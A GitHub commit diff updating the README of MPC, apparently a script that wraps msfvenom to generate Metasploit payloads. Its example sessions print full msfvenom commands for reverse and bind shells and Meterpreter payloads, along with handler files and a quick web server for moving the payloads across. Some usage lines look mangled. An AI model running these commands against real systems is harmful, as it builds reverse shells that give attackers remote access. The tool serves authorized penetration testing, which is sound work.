Skip to content

Commit eca0d69

Browse files
committed
v1.3.2: Updated README
1 parent 2bdf88a commit eca0d69

File tree

1 file changed

+54
-20
lines changed

1 file changed

+54
-20
lines changed

README.md

+54-20
Original file line numberDiff line numberDiff line change
@@ -34,15 +34,15 @@ mpc
3434

3535
```
3636
root@kali:~# mpc -h -v
37-
[*] Msfvenom Payload Creator (MPC v1.3)
37+
[*] Msfvenom Payload Creator (MPC v1.3.2)
3838
39-
[i] /usr/bin/mpc <TYPE> (<DOMAIN/IP>) (<PORT>) (<CMD/MSF>) (<BIND/REVERSE>) (<STAGED/STAGELESS>) (<TCP/HTTP/HTTPS/FIND_PORT>) (<BATCH/LOOP>) (<VERBOSE>)
40-
[i] Example: /usr/bin/mpc windows 192.168.1.10 # Windows & manual IP.
41-
[i] /usr/bin/mpc elf eth0 4444 # Linux, eth0's IP & manual port.
42-
[i] /usr/bin/mpc stageless cmd py verbose # Python, stageless command prompt.
43-
[i] /usr/bin/mpc loop eth1 # A payload for every type, using eth1's IP.
44-
[i] /usr/bin/mpc msf batch wan # All possible Meterpreter payloads, using WAN IP.
45-
[i] /usr/bin/mpc help verbose # This help screen, with even more information.
39+
[i] /usr/bin <TYPE> (<DOMAIN/IP>) (<PORT>) (<CMD/MSF>) (<BIND/REVERSE>) (<STAGED/STAGELESS>) (<TCP/HTTP/HTTPS/FIND_PORT>) (<BATCH/LOOP>) (<VERBOSE>)
40+
[i] Example: /usr/bin windows 192.168.1.10 # Windows & manual IP.
41+
[i] /usr/bin elf eth0 4444 # Linux, eth0's IP & manual port.
42+
[i] /usr/bin stageless cmd py verbose # Python, stageless command prompt.
43+
[i] /usr/bin loop eth1 # A payload for every type, using eth1's IP.
44+
[i] /usr/bin msf batch wan # All possible Meterpreter payloads, using WAN IP.
45+
[i] /usr/bin help verbose # This help screen, with even more information.
4646
4747
[i] <TYPE>:
4848
[i] + ASP
@@ -104,7 +104,7 @@ root@kali:~#
104104

105105
```bash
106106
root@kali:~# mpc windows 192.168.1.10
107-
[*] Msfvenom Payload Creator (MPC v1.3)
107+
[*] Msfvenom Payload Creator (MPC v1.3.2)
108108
[i] IP: 192.168.1.10
109109
[i] PORT: 443
110110
[i] TYPE: windows (windows/meterpreter/reverse_tcp)
@@ -120,14 +120,22 @@ root@kali:~#
120120
## Example \#2 (Linux Format, Fully Automated With Interface and Port)
121121

122122
```bash
123-
root@kali:~# ./mpc elf eth0 4444
124-
[*] Msfvenom Payload Creator (MPC v1.3)
125-
[i] IP: 192.168.103.238
126-
[i] PORT: 4444
127-
[i] TYPE: linux (linux/x86/shell/reverse_tcp)
128-
[i] CMD: msfvenom -p linux/x86/shell/reverse_tcp -f elf --platform linux -a x86 -e generic/none LHOST=192.168.103.238 LPORT=4444 > /root/linux-shell-staged-reverse-tcp-4444.elf
129-
[i] linux shell created: '/root/linux-shell-staged-reverse-tcp-4444.elf'
130-
[i] MSF handler file: '/root/linux-shell-staged-reverse-tcp-4444-elf.rc' (msfconsole -q -r /root/linux-shell-staged-reverse-tcp-4444-elf.rc)
123+
root@kali:~# . elf bind eth0 4444 verbose
124+
[*] Msfvenom Payload Creator (MPC v1.3.2)
125+
[i] IP: 192.168.103.140
126+
[i] PORT: 4444
127+
[i] TYPE: linux (linux/x86/shell/bind_tcp)
128+
[i] SHELL: shell
129+
[i] DIRECTION: bind
130+
[i] STAGE: staged
131+
[i] METHOD: tcp
132+
[i] CMD: msfvenom -p linux/x86/shell/bind_tcp -f elf --platform linux -a x86 -e generic/none LHOST=192.168.103.140 LPORT=4444 > '/root/linux-shell-staged-bind-tcp-4444.elf'
133+
[i] linux shell created: '/root/linux-shell-staged-bind-tcp-4444.elf'
134+
[i] File: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, corrupted section header size
135+
[i] Size: 4.0K
136+
[i] MD5: 06092c38c3dcb30fcb455e1ee16fb782
137+
[i] SHA1: 19c3ec0e4987c7dd6d77550cacfef617f5d880ed
138+
[i] MSF handler file: '/root/linux-shell-staged-bind-tcp-4444-elf.rc' (msfconsole -q -r /root/linux-shell-staged-bind-tcp-4444-elf.rc)
131139
[?] Quick web server for file transfer? python -m SimpleHTTPServer 8080
132140
[*] Done!
133141
root@kali:~#
@@ -136,8 +144,8 @@ root@kali:~#
136144
## Example \#3 (Python Format, Stageless Command Prompt Using Interactive IP Menu)
137145

138146
```bash
139-
root@kali:~# mpc stageless cmd py verbose
140-
[*] Msfvenom Payload Creator (MPC v1.3)
147+
root@kali:~# bash mpc.sh stageless cmd py https
148+
[*] Msfvenom Payload Creator (MPC v1.3.2)
141149

142150
[i] Use which interface/IP address?:
143151
[i] 1.) eth0 - 192.168.103.238
@@ -167,6 +175,32 @@ root@kali:~#
167175
```
168176
_Note: Removed WAN IP._
169177

178+
179+
## Example \#4 (Loop)
180+
181+
```bash
182+
root@kali:~# bash mpc.sh loop eth1
183+
[*] Msfvenom Payload Creator (MPC v1.3.2)
184+
[i] Loop Mode. Creating one of each TYPE, with default values
185+
186+
[*] Msfvenom Payload Creator (MPC v1.3.2)
187+
[i] IP: 192.168.155.175
188+
[i] PORT: 443
189+
[i] TYPE: windows (windows/meterpreter/reverse_tcp)
190+
[i] CMD: msfvenom -p windows/meterpreter/reverse_tcp -f asp --platform windows -a x86 -e generic/none LHOST=192.168.155.175 LPORT=443 > '/root/windows-meterpreter-staged-reverse-tcp-443.asp'
191+
[i] windows meterpreter created: '/root/windows-meterpreter-staged-reverse-tcp-443.asp'
192+
[i] MSF handler file: '/root/windows-meterpreter-staged-reverse-tcp-443-asp.rc' (msfconsole -q -r /root/windows-meterpreter-staged-reverse-tcp-443-asp.rc)
193+
[?] Quick web server for file transfer? python -m SimpleHTTPServer 8080
194+
[*] Done!
195+
196+
197+
[*] Msfvenom Payload Creator (MPC v1.3.2)
198+
...SNIP...
199+
[*] Done!
200+
201+
root@kali ~$
202+
```
203+
170204
![Examples](https://i.imgur.com/r9Qmzda.png)
171205

172206
- - -
@@ -176,4 +210,4 @@ _Note: Removed WAN IP._
176210
* Shellcode generation
177211
* x64 payloads
178212
* IPv6 support
179-
* Look into using OS scripting more _(`powershell_bind_tcp` & `bind_perl` etc)_
213+
* Look into using OS scripting more _(`powershell_bind_tcp` & `bind_perl` etc)_

0 commit comments

Comments
 (0)